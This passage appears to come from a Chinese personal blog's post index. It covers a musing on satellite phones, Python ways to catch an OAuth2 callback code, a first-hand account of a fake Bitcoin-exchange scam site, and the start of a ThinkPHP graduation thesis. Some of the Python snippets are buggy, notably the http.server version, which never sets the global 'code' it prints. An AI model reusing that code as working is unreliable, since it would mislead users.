和这个类似的还有卫星电视，虽然卫星电视也不需要双向通信，但是可能因为它带宽比较大，然后稳定性要求比较高？所以大多需要一个接收锅来接收卫星信号。不过也许我说的是错的，以前在智能手机不太流行的时候有一种能在小型设备上观看的卫星电视，叫做CMMB，那个就是在手机上拉出一条天线就可以看电视了，不过我不太确定这个是通过卫星还是通过地面中继的方式工作的，也许两个都有？我记得这个似乎在房间里面也能收到信号，不太确定这小小的天线是不是真的能连接到卫星。   除了这些之外，还有一些搞业余无线电之类的人可以从国际空间站上通过SSTV之类的方式发送比如在太空中拍的图片啥的，不过我不太了解这些😂，就不多说了。   至于双向通信可能日常遇见的比较少，可能比较常见的就是有些电视台会使用卫星来转发信号之类的，还有就是打国际长途的时候似乎也是通过卫星来转发的。当然做这些操作的设备一般天线都非常大。   小的倒也不是没有，有些比较高级的车上面会搭载车载卫星电话，在紧急救援的时候就可以使用，当然普通的卫星电话也不大，只不过一般都会带折叠天线，价格倒是也还好，便宜的也有2K多。除了卫星电话之外可能最知名的就是星链了，那个也是使用的是卫星锅来上网，不过因为是近地卫星，而且数量众多，所以速度要比通讯卫星的速度快得多。      除此之外我之前还看过一位大佬用卫星和世界各地的人通信，不过那个天线比较大，还要手动操作😂。关于华为卫星电话的看法综上所述，华为新出的卫星电话能不使用外置天线就能使用卫星电话似乎确实挺厉害的？不过因为我没用过普通的卫星电话所以不太清楚，如果普通的卫星电话不需要转手机来寻星，那华为的卫星电话可能算不了什么，毕竟那么大个直板机，把自己当天线也不是什么难事。不过如果普通的卫星电话也需要瞄准卫星才能通信，那华为应该还是有点水平的。   我看过几个这个手机拆解视频，不过到处都没有看到明显的天线痕迹，卫星电话应该需要一个比较大的天线吧……那它能把天线藏到哪里呢？我想那个巨大的均热板会不会是天线呢？本来就是铜的，当个天线可能也是正常的吧，不过我毕竟在云，也不能完全确定😂。  至于在智能手机上增加卫星电话的功能……其实我觉得这是个莫名其妙的行为，可能主要还是为了营销，从价格上来说，3K买个卫星电话+3K买个SOC是骁龙8gen2的手机（例如红米K60 Pro）也比华为Mate 60 Pro便宜，而且灵活性和手机性能都更好，我不知道增加了这个卫星电话功能对手机成本的增加到底有多少，如果很多的话我想除了脑子有病的厂商才会去干这件事，毕竟绝大多数的情况都用不到卫星电话，很多时候没有移动信号的时候同样也接收不到卫星信号，比如埋在废墟中或者在电梯中等，除此之外还只能使用中国电信的SIM卡才能使用，还要开通套餐，还只能使用天通卫星，去远一点的海上旅个游是不是又得买别的卫星电话😅。当然如果成本很低，比如确实就是均热板另外加个芯片就能用那我觉得还行，就是销售价格太贵，不过是公司想多赚点嘛，这能理解😆。   至于有些人说的布局6G那就更扯了，如果真的6G是卫星网络，那不可能不加天线，我相信没人会想瞄着卫星上网吧，而且卫星网络无论如何都没办法做的比地面基站更快，总不至于6G比5G还慢吧🤣。感想卫星通信看似高级，不过本质其实就只是和飞的比较快（同步卫星可能不需要考虑这个吧……），离得比较远 （几万公里其实还挺远的🤣） 的无线电台通信罢了，再简单点，拿个激光笔都能和几公里外的人通信，所以这真不是啥难事，想想人类都能和飞了不知多远的旅行者1号通信，是不是觉得其实还好呢？" },{ "title": "如何让Python脚本接收OAuth2.0的Code？", "category": "", "tags": "Python, 服务器, OAuth", "url": "/2023/08/01/auth.html", "date": "2023/08/01", "content": "越简单，就越复杂。起因最近我在写一个在Windows上运行的Python脚本，需要做一个类似于第三方登录的功能。一般来说像这种东西都是使用的OAuth2.0来做认证，我接入的平台没有悬念的也是使用的这个东西，其中的重点就是获取到第三方网站的授权码Code，然后用它换取用户信息。于是我就在想怎么做比较好呢？解决方法1. 使用URI Scheme我看VSCode在实现类似功能的时候似乎用到了URI Scheme，就是在系统中注册一个伪协议，然后通过这个伪协议来调用程序实现获取Code，方法很简单，首先先在注册表里导入：Windows Registry Editor Version 5.00    [HKEY_CLASSES_ROOT\\mayx]  \"URL Protocol\"=\"D:\\\\mayx.exe\"  @=\"MayxProtocol\"    [HKEY_CLASSES_ROOT\\mayx\\DefaultIcon]  @=\"D:\\\\mayx.exe,1\"    [HKEY_CLASSES_ROOT\\mayx\\shell]    [HKEY_CLASSES_ROOT\\mayx\\shell\\open]    [HKEY_CLASSES_ROOT\\mayx\\shell\\open\\command]  @=\"\\\"D:\\\\mayx.exe\\\" \\\"%1\\\"\"  然后编写一个Python脚本并用Pyinstaller打包：import sysprint(sys.argv[1])最后将回调地址填为“mayx://get”，这样认证完成之后就会像这样调用程序：“D:\\mayx.exe mayx://get?code=something”，再用urllib简单做个解析就完成了。   这样看起来是不是非常的简单？看起来确实是挺简单的，可惜坑比较大，第一个是像上述这样的注册表有些杀毒软件会拒绝导入，因为像“shell\\open\\command”这种东西被病毒啥的滥用的地方太多了，除非软件通过了数字签名或者某些认证，否则正常情况下根本没法导入。二是不是所有的第三方平台都支持伪协议的方式调用，不过我试了一下我用的那个平台倒是支持😂，除了杀毒软件比较讨厌之外其他的倒还好。2. 使用http服务监听很多跨平台的程序，像有些主要在Linux上运行的某些程序就喜欢在获取Code的时候启动一个简单的web服务。其实用这个方法的话可能还更方便一点，不容易出问题。使用Flask实现最开始，我想着要不然就用Flask来实现这个功能吧，实现起来也简单，写起来就几行：from flask import Flask, requestcode = \"\"app = Flask(__name__)@app.route('/getcode')def get():    global code    code = request.args.get(\"code\")    shutdown = request.environ[\"werkzeug.server.shutdown\"]    shutdown()    return \"OK\"app.run(host=\"127.0.0.1\",port=8000)print(code)看起来也确实很简单，功能实现的也很完美，但是有个问题是总感觉用Flask做这么简单的事情实在是大材小用，打包成程序也要占不少空间，另外就是这个方法已经被弃用了，感觉就是很不爽。那要说不爽的话怎么才爽呢？使用socket实现我想起来之前期末时写的期末作业socket-bbs，这就是用socket实现的一个简单的论坛，那我这么简单的功能想来用socket实现不是很好吗？于是就写了一个：（这段代码没有测试，因为这个方法不能用所以把代码删了，这是重新做的）import socketimport urllib.parseserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #打开一个网络连接server.bind(('127.0.0.1',8000)) #绑定要监听的端口server.listen(5)  # 设置最大的连接数量为5code = \"\"while True:    sock, addr = server.accept()  # 建立客户端连接    data = sock.recv(8192).decode('utf-8').split('\\r\\n')#接收TCP数据，数据以字符串的形式返还    if not data[0]:        sock.close()  # 关闭连接        continue    url = urllib.parse.urlparse(data[0].split()[1])    if url.path == '/getcode':        query = urllib.parse.parse_qs(self.data)        code = query[\"code\"][0]        sock.send((\"HTTP/1.0 200 OK\" + '\\r\\n').encode('utf-8'))        sock.send((\"Content-Type: text/html; charset=utf-8\" + '\\r\\n').encode('utf-8'))        sock.send('\\r\\n'.encode('utf-8'))        sock.send(\"OK\".encode('utf-8')) #发送TCP数据        sock.close()  # 关闭连接        break    else:        sock.send((\"HTTP/1.0 404 Not Found\" + '\\r\\n').encode('utf-8'))        sock.send((\"Content-Type: text/html; charset=utf-8\" + '\\r\\n').encode('utf-8'))        sock.send('\\r\\n'.encode('utf-8'))        sock.send(\"Not Found\".encode('utf-8')) #发送TCP数据        sock.close()  # 关闭连接print(code)看起来是不是复杂多了？其实大多数时候工作的好像挺正常的，但是不知道为什么莫名其妙第一次访问的时候会卡住，改了半天头都大了，于是就只好放弃这种方法了……使用http.server实现这时候我突然想到我平时用来传文件用的python自带的模块http.server，既然这个模块是自带的，大小应该大不到哪去吧？随后我就写了一个：from http.server import BaseHTTPRequestHandler, ThreadingHTTPServerimport urllib.parsecode = \"\"class Resquest(BaseHTTPRequestHandler):    timeout = 5    def do_GET(self):        url = urllib.parse.urlparse(self.path)        if url.path == \"/getuser\":            self.send_response(200)            self.send_header(\"Content-type\", \"text/html\")  # 设置服务器响应头            code = urllib.parse.parse_qs(url.query)[\"code\"][0]            buf = '''OK'''            self.wfile.write(buf.encode())            self.server.shutdown()        else:            self.send_response(404)            self.send_header(\"Content-type\", \"text/html\")  # 设置服务器响应头            self.end_headers()            buf = '''Not Found'''            self.wfile.write(buf.encode())host = (\"127.0.0.1\", 8000)server = ThreadingHTTPServer(host, Resquest)print(\"Starting server, listen at: %s:%s\" % host)server.serve_forever()server.socket.close()print(code)最后打包试了一下，功能正常，虽然还是大了点，不过比Flask小😁。其实我在写这个代码的时候，最开始不知道要在最后加上server.socket.close()，一开始写的时候总是遇到程序执行完之前端口必定不会释放，令人很烦，直接搜也没什么好的结果，不过问了下ChatGPT立马就解决了🤣，它说：  当你调用server.shutdown()来停止服务器时，它会停止接收新的连接，并关闭已有的连接。但是，由于Python的socket库的设计，socket对象并不会立即释放端口。相反，它会在一段时间内处于TIME_WAIT状态，以确保在网络中所有挂起的数据都被正确传递或丢弃。这是一种网络协议的要求，称为”TCP TIME_WAIT”状态。AI还真是方便啊……感想解决这么一个小问题却一时半会拿不下最合适的方案，这难道就是了解太多的副作用吗😝，不过最终来看还是AI厉害，一下子就解决了我的问题。" },{ "title": "分享一种无人值守的新型诈骗手段", "category": "", "tags": "骗子, 诈骗", "url": "/2023/07/09/bitmo.html", "date": "2023/07/09", "content": "差点就被骗子骗了🤣，还是主动上钩的……起因今天因为某些原因从网上随便搜了一个公共的接码平台用，接完自己要用的短信之后突然瞥到这么一条信息：  NEW BlTMØ L0GlN || www.Bitmo.vip || Username:Huzhou Pa**word:4894688 BaIance:65.77BTC………我没怎么注意这条信息的意思，但是既然有网站名，用户名和密码，自然会不由自主的想去登录一下啦，然后就会看到账户里有巨额的财产。我登录的时候账户里面还有67BTC，换算下来大概有1400wCNY的样子。落入圈套刚开始我打开这个网站的时候还没意识到这是个诈骗网站，还以为是哪个交易所，不过既然登录上来了自然想看看登录账号后的网站都有些啥功能，首先看到的就是些充值、提现、转账和开票之类的功能，看上去好像还挺像回事的，不过试了几下除了转账之外的其他功能其实是没法用的，充值和开票需要用到安全密钥，而提现除了需要用到安全密钥外，系统说账户因为1年没提现了，所以提现功能被禁用了，但是仍然可以转账:  Withdrawal to your registered ฿itcoin wallet address has been disabled because you haven’t withdrawn for more than 365 days. To reactivate withdrawal you need to contact customer care and provide your secure key you created during account registration. You will still be able to carry out transfers and transactions from your account balance to other BITMO VIP members without your secure key for the next 6 months.于是我想都没想就注册了一个账户，想着既然有这个功能就给自己转点钱呗。注册好账户以后发现我是免费账户，除了开通VIP外什么功能都用不了，而开通VIP至少要充0.004BTC进去，大约相当于800多CNY。当然VIP我是不可能开的，我打算先试试转钱到我的账户中。   在转账的过程中，一次最多只能转出0.2BTC，而且同一个IP似乎只能转一次。我试着转了0.2BTC到我的账户中，想不到还成功了😨，毕竟0.2BTC也相当于4w多CNY呢，于是我换了一个IP又转了一次，也成功了，不过第三次会失败，貌似免费账户最多只能接受0.4BTC。随后我登录到我的账户上看了一眼，我以为转完之后我会直升VIP6，结果系统显示免费账户不能接受转账，必须开通VIP才可以：  Hello MAYX, the user HUZHOU has recently tried to transfer 0.40000 ฿TC ($ 12088.33) to your account. Our system witheld the transfer because free-trial accounts cannot send or receive Bitcoin through our service. Once you make an investment in any of our VIP plans, our system will automatically add the 0.40000 ฿TC ($ 12088.33) to your VIP account balance.产生怀疑这时候我开始怀疑这个网站的身份了，我看了一眼帮助，显示这个平台是一个2014年创立的平台，可是我搜了一下域名的WHOIS发现它是2023-05-28创建的……也就不可能存在有大佬在一年或者更早存这么多钱进去了。Google搜索了一下这个平台也没有相关的结果，看来是诈骗网站没错了。毕竟就算是最低的VIP也要不少钱，充进去能把那0.4BTC拿到的概率只能说是0%……可惜错失了一次发财的机会啊🤣。   之后看了看它的源代码，里面怎么还有中文🤣，原来是国人开发的诈骗网站。仔细看了看结果发现其他功能的报错都是硬编码的，根本就没有请求服务器😅。感想前两次收到的诈骗邮件富婆找对象和被拍糟糕视频两个可以说是真的傻子才会相信，因为内容太离谱了，能上当的人太少了，而且我发完邮件他们还得回复，效率也很低下。这次遇到的这个诈骗就好多了，让被骗的人很有参与感，而且建好网站之后什么都不用做，只要等着有人打钱就好，效率非常高，而且做的还挺像回事，估计被骗的人不会少。   不过之后想想也是，这种短信大概率就是那种群发的垃圾短信，实际上主动登录的人应该也不多吧😂。" },{ "title": "基于ThinkPHP5.1核酸检测登记系统的设计与开发", "category": "", "tags": "核酸检测, 后端, 系统设计, 论文", "url": "/2023/06/30/nucleic-acid.html", "date": "2023/06/30", "content": "论如何水一篇论文🤣前言最近终于顺利毕业了……既然说到毕业，那毕业论文肯定是最重要的。既然已经毕业了，那就顺便把毕业论文发出来吧，反正也算是我写的东西 （可以拿来水一水博客😝） 。另外还有配套的项目源代码也一起发出来吧。   另外这个毕业论文经过了ChatGPT润色，包括项目代码也使用Github Copilot，现在的AI真的是相当方便啊，自己写的不通顺的地方，它可以帮你改的更流畅，算是理科生的福音了😝，而且内容是完全原创的，查重也只有个位数，大大降低我在写这个没用的东西上浪费的时间😁，而且写的也相当不错，可以说确实是能大幅提高生产力了，至少在AI兴起的这段时间里，不仅仅是玩AI，也得拿AI解决点自己的问题才算跟得上时代吧。   另外原文的所有图片为了节省空间，还有一些比较复杂的表格因为用Markdown写太麻烦所以都去除掉了，那么从接下来开始就是论文的正文部分了：摘要本文介绍了基于ThinkPHP框架开发的核酸检测登记系统的设计和开发过程，包括需求分析、数据库设计、功能实现和系统测试等方面。该系统旨在方便用户在线登记核酸检测信息，提高检测效率、减少人员接触，专为新冠疫情防控而设计。在需求分析阶段，规划了系统的功能和性能需求；在数据库设计方面，采用了关系型数据库MySQL；在功能实现方面，使用了前后端分离架构，其中后台前端采用Vue框架，用户前端使用jQuery库，后端采用ThinkPHP框架；在系统测试方面，介绍了系统测试结果及问题解决方案。通过本文的介绍，读者可以了解项目开发的各个方面，对具体的项目开发有更深入的认识。关键词： 核酸检测，后端，系统设计ABSTRACTThis article describes the design and development process of a nucleic acid testing registration system based on the ThinkPHP framework, including requirements analysis, database design, feature implementation, and system testing. The system aims to facilitate users in registering nucleic acid testing information online, improve testing efficiency, reduce personnel contact, and is specifically designed for COVID-19 pandemic prevention and control. In the requirements analysis phase, the system’s functional and performance requirements were planned. For database design, a relational database MySQL was adopted. In feature implementation, a front-end and back-end separation architecture was used, with the back-end front-end using the Vue framework, user front-end using the jQuery library, and the back-end using the ThinkPHP framework. System testing results and problem-solving solutions are also presented. Through this article, readers can gain a comprehensive understanding of the various aspects of project development and have a deeper understanding of specific project development. Key Words: nucleic acid testing, back-end, system design第1章\t绪论1.1 选题背景核酸检测是一种用于检测病原体（例如病毒、细菌等）的常见检测方法之一，也被广泛用于新型冠状病毒（COVID-19）的检测中。在COVID-19大流行期间，核酸检测已成为公共卫生应对策略的重要组成部分。核酸检测主要是通过提取样本中的核酸（例如RNA或DNA），然后使用特定的技术（例如聚合酶链式反应PCR）扩增特定的基因序列来检测是否存在目标病原体。这些检测技术可以用于检测病原体的存在，也可以用于确定感染者的数量和病毒载量等信息文章内容[1]。对于COVID-19，核酸检测被广泛用于诊断和监测感染者，以及筛查病毒感染的人群。许多国家和地区都采取了强制性的核酸检测措施来控制疫情，例如旅行前的检测和隔离措施。为了有效地管理核酸检测和监测COVID-19疫情，许多地区建立了核酸检测登记系统。这些系统通常由卫生部门或其他相关机构负责，旨在收集和管理核酸检测的数据，以便有效地跟踪和监测疫情的发展趋势，并及时采取必要的应对措施。本文以ThinkPHP开发框架为基础，微信平台作为承载，研究了基于ThinkPHP5.1的核酸检测登记系统的设计与实现，包括系统需求分析、系统功能设计、公众号设计、接口设计以及数据库设计。重点阐述了普通用户与管理用户的用户模块、核酸试剂模块、公告模块的设计[2]。1.2 研究目标和意义该研究的主要目标是设计和实现一个基于ThinkPHP5.1的核酸检测登记系统，该系统可以通过微信平台进行访问和使用。该系统将具有以下功能：   用户模块：该系统将支持普通用户和管理用户两种不同类型的用户。普通用户可以在系统中注册并填写个人信息，以便卫生部门进行核酸检测和疫情监测。管理用户可以对系统中的数据进行管理和维护，包括审核用户信息、发布公告、查询数据等。   核酸试剂模块：该系统将支持管理用户管理核酸试剂信息，包括试剂的识别码、生产商、库存等信息。同时，系统将支持管理用户对试剂进行状态编辑、入库、销毁等操作，以便跟踪试剂的使用情况和库存情况。   公告模块：该系统将支持管理用户发布公告，包括疫情通报、政策通知、操作指南等信息。同时，系统将支持普通用户查看最新公告，并及时掌握疫情信息和政策变化。   该系统的意义在于：1.提高疫情监测和管理的效率：该系统可以有效地收集和管理核酸检测数据和试剂信息，为卫生部门和政府提供准确的疫情数据和管理信息，有助于及时发现和控制疫情的蔓延。2.提高用户体验和服务质量：该系统通过微信平台进行访问和使用，方便用户随时随地进行核酸检测登记和信息查询，提高用户的使用体验和服务质量。3.促进信息共享和协同合作：该系统可以实现数据共享和信息协同，协助各个部门和机构之间的合作，提高疫情防控的效率和质量。   该研究的创新点在于：将核酸检测结果通过微信公众号进行推送，从而方便用户快速查看检测结果，避免用户不必要的出行和接触风险。此外，通过将核酸检测与微信公众号相结合，可以实现对用户健康状态的实时监测和管理，进而提高社区健康防控水平。这一创新方法不仅提高了检测结果的传递效率，还为健康管理和疾病预防提供了新的思路。值得一提的是，该方法不仅适用于核酸检测，在其他领域的应用也具有潜力，可以为现代社会的公共卫生事业做出更大的贡献。1.3 国内外现状为确保核酸检测结果的真实性和可靠性，全球各国和地区都采用信息化技术建立了核酸检测登记系统，该系统将检测结果与检测者身份信息进行绑定。在疫情防控中，该系统有助于追踪和管理疫情。在设计相关产品之前，需要了解国内外核酸检测登记系统的现状，以更好地进行系统设计和开发。1.3.1 国内现状在中国，核酸检测登记系统已成为疫情防控的重要组成部分，并且已得到广泛应用。从2020年开始，核酸检测登记系统已成为中国疫情防控的重要组成部分，并且已得到广泛应用。这个系统的实施为疫情防控提供了极大的便利和帮助，既可以确保每个接受核酸检测的人的检测结果真实可靠，也可以实现有效的疫情追踪和管理。   在这个系统中，每个接受核酸检测的人都需要提供身份证件信息和手机号码，并将检测结果与个人信息进行绑定。这样一来，每个人的检测结果都可以被准确地记录和管理。此外，中国各个城市和机场也建立了相应的核酸检测登记系统，以确保疫情防控的有效性。这些系统通过高效的信息技术手段，实现了对接受检测的人员的信息管理和追踪，使疫情防控工作更加有力和高效。   除了国家级的核酸检测登记系统外，很多省市也建立了自己的系统，通过手机应用程序实现了个人核酸检测结果、健康状态和行程轨迹的信息管理。每个人的健康码都是动态的，根据个人的核酸检测结果、行程轨迹和接触史等信息进行自动更新，方便了疫情追踪和管理。这些系统的建立和应用为疫情防控提供了重要的技术支持和保障，同时也为其他公共卫生事件的应对提供了宝贵的经验和借鉴。1.3.2 国外现状随着新冠疫情在全球蔓延，越来越多的国家开始采取措施建立自己的核酸检测登记系统。除了美国CDC建立的COVID-19报告门户网站之外，其他国家也纷纷建立类似的在线平台，以便实验室和医疗机构可以直接向相关部门报告病例和检测结果。这些国家包括但不限于英国、德国、法国、澳大利亚等。   在欧洲，除了欧盟数字COVID证书系统外，一些国家也开始建立自己的核酸检测登记系统。例如，英国建立了国家医疗服务体系（NHS）测试和跟踪系统，该系统允许英国居民在线预约COVID-19测试，同时可以跟踪他们的检测结果[3]。在德国，类似的系统名为Corona-Warn-App，通过手机应用程序追踪人们的接触历史和检测结果[4]。   随着全球疫情形势的不断发展，建立核酸检测登记系统已成为越来越多国家的必然选择。这些系统可以更好地追踪和管理疫情，为政府和公众提供及时、准确的疫情信息，从而更好地应对疫情挑战。此外，这些系统还可以为旅行者提供方便，使他们能够更加安全地穿越不同国家和地区的边境，保护自己和他人的健康安全。1.4 论文结构本论文根据软件开发过程，详细阐述了系统实现整体流程，分为七章内容，具体结构如下：   第一章是本文的引言部分，主要介绍了核酸检测的背景、研究目的与意义、国内外研究现状以及研究内容与方法。通过对核酸检测的背景和相关问题的深入认识和分析，可以更好地理解本文的研究背景和动机。   第二章将对与本研究相关的技术进行概述，本章旨在为后续的研究内容提供技术支持和基础知识，帮助读者更好地理解本研究的实现和应用。   第三章主要对系统进行了需求分析及设计。具体而言，本章包括了系统的设计目标、功能和角色的关系和流程等方面的详细介绍。   第四章通过详细介绍每个模块的接口设计，展示了系统各个模块之间的联系和交互方式，以及模块之间的数据传输方式和数据格式。此外，我们还介绍了数据库的结构设计，包括表的设计、数据类型的选择、索引的使用等等。通过这些介绍，读者可以更好地了解系统的整体架构和实现细节。   第五章详细描述了系统的部分模块的具体实现过程，其中包括系统设计、系统功能的实际实现以及部分实现后的系统运行界面展示等。这一章节的目的是满足系统设计需求，并确保系统的各项功能能够得到有效的实现。   第六章我们会对一些接口进行软件测试。这包括设计测试用例、配置测试环境以及记录相应的测试结果。通过这些测试，我们不断改进系统，提高其性能。   第七章对主要是对本论文内容的总述以及展望。第2章\t相关技术概述2.1 PHP语言PHP（全称：Hypertext Preprocessor，中文名“超文本预处理器”）是一种广泛使用的开源服务器端脚本语言，它主要用于Web应用程序的开发。PHP可以嵌入到HTML中，也可以独立运行在服务器端，通过处理数据、生成动态内容和与数据库交互等方式来构建Web应用程序[5]。   PHP最初是由Rasmus Lerdorf在1994年开发的，后来由开源社区不断发展和完善。PHP具有易学易用、高效快速、跨平台等特点，可以与各种Web服务器和数据库配合使用。目前，PHP已经成为最受欢迎的Web开发语言之一，许多知名的网站和应用程序都采用了PHP开发[6]。2.2 ThinkPHP框架ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，是为了敏捷WEB应用开发和简化企业应用开发而诞生的。此框架提供了一系列丰富的功能和组件，包括路由、模板引擎、数据库操作、缓存、表单验证、文件上传等，支持多语言、多模块、多应用等功能，能够满足不同规模和需求的项目开发。另外该框架具有良好的扩展性和可定制性，可以根据实际需求选择和配置不同的组件和插件[7]。同时，ThinkPHP框架也拥有一个活跃的开源社区，提供了丰富的文档和教程，方便开发者快速学习和上手。2.3 MySQL数据库MySQL是一款开源的关系型数据库管理系统，是目前最受欢迎的数据库之一。MySQL使用标准的SQL语言进行操作，支持多种操作系统，包括Windows、Linux、UNIX等，以及多种编程语言，如PHP、Java、Python等。   MySQL提供了高性能、高可靠性、高可扩展性和丰富的功能，支持事务处理、存储过程、触发器、视图、索引等，具有较好的安全性和稳定性。同时，MySQL也有很好的社区支持和文档资料，开发者可以方便地获取相关帮助和资源[8]。   MySQL被广泛应用于Web应用程序、电子商务、社交网络、金融、游戏等领域，是许多知名网站和企业的首选数据库。2.4 API技术API（Application Programming Interface，应用程序编程接口）是一组定义了软件应用程序之间如何互相通信的规则和接口。API提供了一个标准的方式，使得应用程序之间可以相互调用，获取所需的数据和功能。它可以用于不同平台和编程语言之间的通信，如Web应用程序、移动应用程序、桌面应用程序等。API定义了一些公共的接口和参数，使得应用程序之间可以相互交换数据和信息，完成各种任务和功能。API可以分为不同的类型，如Web API、操作系统API、库API等。其中，Web API是最为常见和广泛应用的类型，它通过HTTP协议传输数据，通常采用RESTful架构风格或者SOAP协议[9]。使用API可以极大地提高应用程序的开发效率和可重用性，促进应用程序之间的协作和集成。2.5 本章小结在本章中，我们对本论文开发过程中使用的开发语言、工具和数据库软件进行了介绍。此外，本章还介绍了系统开发项目在实现过程中使用到的主要开发技术。我们详细介绍了这些技术的原理和应用，以帮助读者更好地理解本项目的开发过程。第3章\t需求分析及设计3.1 软件需求分析基于ThinkPHP5.1的核酸检测登记系统是一个高负荷的系统，为了保障核酸检测登记系统的高可用和长期稳定使用，并满足业务流转的需求，我们将采用基于ThinkPHP5.1框架的PHP语言进行开发。同时，我们将通过前后端分离的方式[10]，使用Vue框架编写后台前端，微信公众号作为面向普通用户的前端，并将数据存储在MySQL数据库中，以建立一套稳定高效的系统。3.2 功能需求分析核酸检测登记系统的设计与开发需要考虑到各方面的因素，包括系统的可用性、可扩展性、可维护性等。在设计之初，我们通过对以往核酸检测的经验和实际需求的分析，确定了该系统的主要功能和模块，以及各个模块之间的交互和流程。   为了实现高效的信息收集和处理，系统采用了基于微信端和后台管理系统的分层设计，将不同的功能模块划分到不同的层级中。微信端提供给用户和检测者使用的功能主要包括绑定、二维码展示、检测结果查询、扫码登记和公告查看等，这些功能通过微信公众号平台实现，可以方便地让用户和检测者进行操作，同时也保障了系统的安全性。后台管理系统则负责管理整个系统的数据和逻辑流程，包括公告管理、用户管理和管码管理等，这些功能可以通过Web界面进行操作，使得系统管理员可以方便地对整个系统进行管理和监控。   在核酸检测登记系统的实现过程中，也需要注重用户体验的设计。系统采用了人性化的交互方式和UI设计，以简洁、明了的方式呈现信息和功能，从而提高了用户的使用体验和操作效率。3.3 非功能需求分析非功能性需求分析包括易用性和可靠性等方面的分析。对于面向大众的系统来说，易用性要求系统容易被理解，使用学习成本低，操作简洁明了；而对于用户量庞大的系统，可靠性更加重要，需要保证系统在高负载下也不会出现严重问题，并且在出现问题后能够及时恢复。   除此之外，在非功能性需求分析中还需要考虑性能和安全性等方面的分析。性能分析需要考虑系统的响应速度、吞吐量等指标，以确保系统能够在合理时间内完成任务。安全性分析需要考虑系统的数据保密性、完整性和可用性，以避免系统受到恶意攻击或数据泄露等安全问题的影响。   同时，在非功能性需求分析中也需要考虑可维护性和可扩展性等方面。可维护性要求系统易于维护和修改，以保证系统的稳定性和可靠性。可扩展性要求系统能够根据需求增加新的功能或扩展规模，以适应未来的业务需求和用户数量增长[11]。3.4 功能设计3.4.1 角色关系设计核酸检测系统涉及到管理员、核酸检测机构、登记人员和市民四个至关重要的角色，各自担负着不同的职责和任务。下面将详细描述这四个角色在核酸检测系统中所需使用的功能和任务。   管理员是核酸检测系统中的管理者和决策者，拥有对系统的管理和监控职责。管理员需要使用该系统来收集和管理所有与核酸检测相关的信息，例如检测机构、登记人员和检测核酸的市民的基本信息、检测结果、样本的处理情况等等。他们需要定期更新系统中的信息，以确保信息准确完整。此外，管理员还需确保核酸检测系统的安全性，防止信息泄露等安全问题的发生。管理员需要监控整个核酸检测系统的运行，确保系统工作高效运作，以便政府决策人员及时掌握最新的疫情情况。   核酸检测机构在核酸检测系统中扮演着产出核酸检测结果的关键角色。他们需要使用该系统记录和管理所有检测样本相关的信息，例如每个样本的采集时间、状态、结果等等。同时，核酸检测机构需及时更新系统中的信息，以确保管理人员和市民能够及时获取最新的检测结果。在核酸检测工作中，核酸检测机构需要严格遵守操作规程，并保证检测结果的准确性。只有准确的检测结果才能帮助政府制定有效的疫情防控策略。   登记人员在核酸检测系统中扮演着关键执行者的角色。他们需要使用该系统进行前台扫码登记，提交并关联用户信息到系统中，方便用户和管理人员及时得到核酸检测结果通知。登记人员需要确保每个参与核酸检测的市民都完成了前台扫码登记，以便核酸检测机构可以顺利地获取相关的样本的关联信息。   市民是核酸检测系统中的使用者，需要通过该系统记录个人信息，并在核酸检测时通过展示二维码的方式绑定核酸关联关系。市民可通过该系统查询自己的核酸检测情况，并了解相关政策和指导意见。在使用核酸检测系统前，市民需要提供必要的身份验证信息，以确保信息安全和准确性。市民有义务按照规定参加核酸检测，并及时核实检测结果。3.4.2 流程设计根据上述设计，核酸检测系统将会按以下步骤执行：   试管登记：厂家需要对试管进行登记，包括试管编号等信息，以确保试管的准确性和追踪性。   用户注册和身份验证：用户需要在系统中进行注册并提供身份信息，以便核实身份。扫码人员会根据标准操作采集相应部位的样本，并将样品与试管编码和用户进行绑定，以避免混淆和错误。   样品运输：采样的样品会被运输到核酸检测机构，以进行后续检测步骤。   核酸检测过程：在检测机构内，样品经过复杂的生化反应和PCR扩增等过程，来检测是否存在新冠病毒。   结果上传和记录：检测结果信息会被上传至相关系统中，并记录下核酸检测时间、地点等信息，以便后续跟踪和分析。   结果查看和处理：用户和管理员可以通过系统查看结果信息。如果结果为阳性，则用户需要立即进行隔离治疗，并配合当地防控部门的要求进行后续措施。   整个核酸检测流程需要各方密切配合和精准管理，从而最大程度地提高检测的准确性和效率，进一步强化疫情防控的力量。3.5 本章小结本章主要针对核酸检测登记系统进行了详细的需求分析。首先明确了系统的总体目标和需求分析的前提条件，为后续的功能分析和需求分析奠定了基础。接着对系统进行了功能分析，明确了各个模块之间的业务逻辑关系，确保系统的各项功能能够相互协调和配合。针对系统的核心功能，进行了具体的需求分析，明确每个功能的详细需求，以确保系统的各项功能能够准确地满足用户的需求。   此外，本章还对系统进行了非功能性需求分析，主要考虑系统的易用性、可靠性、性能和安全性等方面，以确保系统不仅具有高效的功能，而且还具有良好的用户体验和安全保障。最后，本章还对系统中各个角色之间的关系和流程进行了详细的设计。第4章\t详细设计作为系统的后端API，需要负责处理各种请求并返回相应的数据。为此，必须仔细设计数据库结构，以确保数据的高效存储和检索。此外，还需要定义各种接口，以便客户端应用程序可以方便地与后端API进行交互。因此，下面提供了关于该系统的详细设计，包括数据库结构、接口定义等方面的内容。4.1 接口设计该系统旨在为微信用户端和后台管理端提供服务，因此需要设计两个独立的模块以支持这两部分服务。这两个模块将包含不同的功能和接口定义，以满足微信用户和后台管理员的需求。因此，在整个系统的设计中，需要考虑这两个模块的交互和协同工作，以确保系统的可靠性和稳定性。4.1.1 后台接口作为后台管理，管理用户是必不可少的任务之一。因此，需要设计一套完整的用户管理接口，以便管理员可以方便地进行用户管理。这些接口将包括用户信息的创建、修改和删除等操作，同时还需要提供查询用户信息的接口，以便管理员能够快速查找和浏览用户信息。   作为核酸检测系统，管理核酸试剂是必不可少的任务之一。因此，需要设计一套完整的核酸试剂管理接口，以便管理员可以方便地进行试剂管理。这些接口将包括试剂的添加，删除、查询和更新等操作。   对于一个管理系统，公告也是必须的信息之一。管理员需要及时发布各种公告，以便向用户传达重要信息或者通知用户系统的更新和维护等情况。因此，需要设计一套完整的公告管理接口，以便管理员可以方便地发布、查询、修改和删除各种公告。这些接口应该具有良好的可扩展性和可维护性，以便随时满足不同的公告需求。   